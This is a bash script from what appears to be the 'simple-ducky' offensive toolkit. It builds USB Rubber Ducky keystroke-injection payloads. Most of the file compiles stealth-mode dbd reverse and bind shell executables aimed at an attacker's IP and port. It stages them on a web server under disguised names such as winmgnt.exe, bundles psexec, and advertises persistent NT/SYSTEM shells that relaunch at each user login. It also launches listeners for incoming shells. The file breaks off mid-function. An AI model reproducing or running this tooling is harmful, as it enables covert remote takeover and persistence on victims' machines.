	echo -e "\e[1;31mDiscription:\e[0mdbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License."
	echo -e "\e[1;31mNote:\e[0m You must install mingw32 to compile DBD executables. This should be done on install but if not, run the 'Dependency Checker' on the Main Menu."
	echo -e "\e[1;31mNote:\e[0m Currently having issues with the bind shell option... It will be addressed in the next update."
	echo -e "\e[1;31mSpecial thanks to:\e[0m Durandal for creating dbd and sharing it with the community."
	echo ""
	echo ""
	echo -e "\e[1;34mWhat kind of payload would you like to build?\e[0m"
	echo ""
	echo "1. Windows DBD Reverse Shell"
	echo "2. Windows DBD Bind Shell (work in progress)"
	echo "3. Linux/NetBSD/FreeBSD/OpenBSD DBD Reverse Shell"
	echo "4. Linux/NetBSD/FreeBSD/OpenBSD DBD Bind Shell"
	echo "5. Install DBD (Required to receive dbd shells)"
	echo "6. Return to the Main Menu"
	echo "7. Quit"
	echo ""
	read -p "Option: " option


	if [ "$option" == "1" ]; then
		clear
		read -p "Where shall I send your persistent shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""
		echo -e "\e[1;34mGenerating your payload...\e[0m"
		echo ""
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.exe
		clear
		#rm dbd.exe
		cd /usr/share/simple-ducky
		echo -e "\e[1;34mDone! Your payload is located at /var/www/winmgnt.exe\e[0m"
		echo ""

		read -p "Would you like me to launch a listener [y|n]? " listener
		echo ""

			if [ "$listener" == "y" ]; then
				x-terminal-emulator -e dbd -lvp $attackerport -k $attackersecret &
				read -p "Press any key to contiue" enter
				clear
				f_mainmenu
			else
				echo -e "\e[1;34mWhen you are ready to receive your shell in your terminal enter:\e[0m"
				echo "dbd -lvp $attackerport -k $attackersecret"
				echo ""
				read -p "Press any key to contiue" enter
				clear
				f_mainmenu
			fi

	elif [ "$option" == "2" ]; then
		clear
		read -p "What port would you like the victim be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""
		echo -e "\e[1;34mGenerating your payload...\e[0m"
		echo ""
		sleep 3
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_bind_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.exe
		clear
		#rm dbd.exe
		cd /usr/share/simple-ducky
		echo -e "\e[1;34mDone! Your payload is located at /var/www/winmgnt.exe\e[0m"
		echo ""
		echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m"
		echo "dbd -nv victim.host.orip $attackerport -k $attackersecret"
		echo ""
		read -p "Press any key to contiue" enter
		clear
		f_mainmenu
	elif [ "$option" == "3" ]; then
		clear
		read -p "Where shall I send your persistent shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""
		echo -e "\e[1;34mGenerating your payload...\e[0m"
		echo ""
		sleep 3
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_unix_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse1.conf
		sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse2.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse1.conf
		rm /usr/share/simple-ducky/misc/dbd/dbd_unix_reverse2.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make unix
		chmod +x dbd
		cp /usr/share/simple-ducky/misc/dbd/dbd /var/www/...
		#rm dbd
		clear
		cd /usr/share/simple-ducky
		echo -e "\e[1;34mDone! Your payload is located at /var/www/...\e[0m"
		echo ""

		read -p "Would you like me to launch a listener [y|n]? " listener
		echo ""

			if [ "$listener" == "y" ]; then
				x-terminal-emulator -e dbd -lvp $attackerport -k $attackersecret &
				read -p "Press any key to contiue" enter
				clear
				f_mainmenu
			else
				echo -e "\e[1;34mWhen you are ready to receive your shell in your terminal enter:\e[0m"
				echo "dbd -lvp $attackerport -k $attackersecret"
				echo ""
				read -p "Press any key to contiue" enter
				clear
				f_mainmenu
			fi

	elif [ "$option" == "4" ]; then
		clear
		read -p "What port would you like the victim be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""
		echo -e "\e[1;34mGenerating your payload...\e[0m"
		echo ""
		sleep 3
		sed "/HOST/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_unix_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_unix_bind1.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_unix_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_unix_bind1.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make unix
		chmod +x dbd
		cp /usr/share/simple-ducky/misc/dbd/dbd /var/www/...
		#rm dbd
		clear
		cd /usr/share/simple-ducky
		echo -e "\e[1;34mDone! Your payload is located at /var/www/...\e[0m"
		echo ""
		echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m"
		echo "dbd -nv victim.host.orip $attackerport -k $attackersecret"
		echo ""
		read -p "Press any key to contiue" enter
		clear
		f_mainmenu
	elif [ "$option" == "5" ]; then
		clear
		f_dbdinstaller
	elif [ "$option" == "6" ]; then
		clear
		f_mainmenu
	elif [ "$option" == "7" ]; then
		clear;exit
	else
		f_dbdbuilder
	fi
}

#################################################################################
# Windows DBD Menu
#################################################################################
f_windowsdbdmenu(){
	clear
	echo -e "\e[1;34mWhere would you like to start?\e[0m"
	echo ""
	echo "1. Windows DBD Reverse/Bind Shell (NT/SYSTEM Shell|Win Vista/7) w/UAC"
	echo "2. Windows DBD Reverse/Bind Shell (NT/SYSTEM Shell|Windows 8) w/UAC"
	echo "3. Return to the Advanced Menu"
	echo "4. Quit"
	echo ""
	read -p "Option: " option

	if [ "$option" == "1" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_windowsdbdVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_windowsdbdVIS7nouac
		fi
	elif [ "$option" == "2" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_windowsdbdWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_windowsdbdWIN8nouac
		fi
	elif [ "$option" == "3" ]; then
		f_advancedmenu
	elif [ "$option" == "4" ]; then
		clear;exit
	elif [ "$option" == "*" ]; then
		clear;exit
fi

}

#################################################################################
# DBD Installer
#################################################################################
f_dbdinstaller(){
	clear
	echo -e "\e[1;34mPlease wait while I install DBD on your machine...\e[0m"
	echo ""
	sleep 3
	cp /usr/share/simple-ducky/misc/dbd/conf/dbd_defaults.conf /usr/share/simple-ducky/misc/dbd/dbd.h
	cd /usr/share/simple-ducky/misc/dbd/
	make unix
	chmod +x dbd
	cp dbd /usr/share/simple-ducky/misc/dbd/binaries/
	mv dbd /usr/bin/
	cd /usr/share/simple-ducky/
	echo ""
	echo -e "\e[1;32mDone! Returning to the Main Menu...\e[0m"
	echo ""
	sleep 3
	f_mainmenu
}

#################################################################################
# DBD Shell w/UAC (Admin Priv Shell|Win Vista/7)
#################################################################################
f_windowsdbdVIS7uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. "
	echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload"
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit "
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype
	echo ""
	if [ "$payloadtype" == "rev" ]; then
		read -p "Where shall I send your persistent shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	elif [ "$payloadtype" == "bind" ]; then
		read -p "What port do you want the victim to be listening on? " victimport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdVIS7uac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del1.conf
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear


	if [ "$payloadtype" == "rev" ]; then
		read -p "Would you like me to setup a listener [y/n]? " listener
		clear
			if [ "$listener" == "n" ]; then
				read -p "Would you like to return to the main menu [y/n]? " option
			elif [ "$listener" == "y" ]; then
				xdg-open /usr/share/simple-ducky/ &
				service apache2 start
				clear
				chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd
				cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd
				dbd -lvp $attackerport -k $attackersecret
			fi
	elif [ "$payloadtype" == "bind" ]; then
		echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m"
		echo "dbd -nv victim.host.orip $victimport -k $attackersecret"
		echo ""
		read -p "Press any key to contiue" enter
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# DBD Shell w/oUAC (Admin Priv Shell|Win Vista/7)
#################################################################################
f_windowsdbdVIS7nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. "
	echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload"
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit "
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype
	echo ""
	if [ "$payloadtype" == "rev" ]; then
		read -p "Where shall I send your persistent shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	elif [ "$payloadtype" == "bind" ]; then
		read -p "What port do you want the victim to be listening on? " victimport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdVIS7nouac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del1.conf
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear


	if [ "$payloadtype" == "rev" ]; then
		read -p "Would you like me to setup a listener [y/n]? " listener
		clear
			if [ "$listener" == "n" ]; then
				read -p "Would you like to return to the main menu [y/n]? " option
			elif [ "$listener" == "y" ]; then
				xdg-open /usr/share/simple-ducky/ &
				service apache2 start
				clear
				chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd
				cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd
				dbd -lvp $attackerport -k $attackersecret
			fi
	elif [ "$payloadtype" == "bind" ]; then
		echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m"
		echo "dbd -nv victim.host.orip $victimport -k $attackersecret"
		echo ""
		read -p "Press any key to contiue" enter
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# DBD Shell w/UAC (Admin Priv Shell|Windows 8)
#################################################################################
f_windowsdbdwin8uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. "
	echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload"
	echo -e "\e[1;31mTarget:\e[0m Windows Windows 8 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit "
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype
	echo ""
	if [ "$payloadtype" == "rev" ]; then
		read -p "Where shall I send your persistent shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	elif [ "$payloadtype" == "bind" ]; then
		read -p "What port do you want the victim to be listening on? " victimport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	fi
	echo -e ""
	echo -e "\e[1;34mDone!\e[0m"
    sleep 3
    clear
	echo -e "\e[1;34mNow let's build your inject.bin\e[0m"
	echo ""
	echo -e "\e[1;34mWhat is the IP/Domain address for your webserver?\e[0m"
	read -p "[Example: www.example.com | www.example.com:port | 192.168.1.100 ] " webserverip
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mPlease wait, generating your inject.bin\e[0m"
	echo ""
	sed "/http/s/domain/$webserverip/g" /usr/share/simple-ducky/payloads/windowsdbdWIN8uac.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del1.conf
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		echo -e "\e[1;34mYour evil executable has been created, it is in located at /var/www/winmgmt.exe\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear


	if [ "$payloadtype" == "rev" ]; then
		read -p "Would you like me to setup a listener [y/n]? " listener
		clear
			if [ "$listener" == "n" ]; then
				read -p "Would you like to return to the main menu [y/n]? " option
			elif [ "$listener" == "y" ]; then
				xdg-open /usr/share/simple-ducky/ &
				service apache2 start
				clear
				chmod +x /usr/share/simple-ducky/misc/dbd/binaries/dbd
				cp /usr/share/simple-ducky/misc/dbd/binaries/dbd /usr/bin/dbd
				dbd -lvp $attackerport -k $attackersecret
			fi
	elif [ "$payloadtype" == "bind" ]; then
		echo -e "\e[1;34mWhen you are ready to connect to the victim, in your terminal enter:\e[0m"
		echo "dbd -nv victim.host.orip $victimport -k $attackersecret"
		echo ""
		read -p "Press any key to contiue" enter
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# DBD Shell w/o UAC (Admin Priv Shell|Windows 8)
#################################################################################
f_windowsdbdwin8nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses a custom dbd executable (bind/reverse shell) and psexec to give the attacker a persistent shell with NT/SYSTEM ACCESS!! DBD uses a 128bit secure connection! In addition a task is scheduled to relaunch the shell every time a new user logs in. "
	echo -e "\e[1;31mNote:\e[0m Special thanks to durandal for developing dbd and helping me fine tune this incredible fast and powerful payload"
	echo -e "\e[1;31mTarget:\e[0m Windows Windows 8 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit "
	echo ""
	echo ""
	echo -e "\e[1;34mLets start by building your evil executable\e[0m"
	echo ""
	read -p "Would you like a reverse or bind shell [rev|bind]? " payloadtype
	echo ""
	if [ "$payloadtype" == "rev" ]; then
		read -p "Where shall I send your persistent shell? " attackerip
		echo ""
		read -p "What port will you be listening on? " attackerport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/attackerip/$attackerip/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_reverse.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		sed "/PORT/s/attackerport/$attackerport/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse1.conf
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_reverse2.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
		cp /usr/share/simple-ducky/misc/psexec.exe /var/www/taskmgnt.txt
		rm dbd.exe
		cd /usr/share/simple-ducky
	elif [ "$payloadtype" == "bind" ]; then
		read -p "What port do you want the victim to be listening on? " victimport
		echo ""
		read -p "What would you like the shared secret to be on your secure connection? " attackersecret
		echo ""

		echo -e "\e[1;34mBuilding your custom dbd payload, this will take a moment...\e[0m"
		sleep 3
		sed "/HOST/s/victimport/$victimport/g" /usr/share/simple-ducky/misc/dbd/conf/dbd_win_bind.conf > /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		sed "/SHARED_SECRET/s/attackersecret/$attackersecret/g" /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf > /usr/share/simple-ducky/misc/dbd/dbd.h
		rm /usr/share/simple-ducky/misc/dbd/dbd_win_bind1.conf
		cd /usr/share/simple-ducky/misc/dbd/
		make mingw-cross CFLAGS=-DSTEALTH
		cp /usr/share/simple-ducky/misc/dbd/dbd.exe /var/www/winmgnt.txt
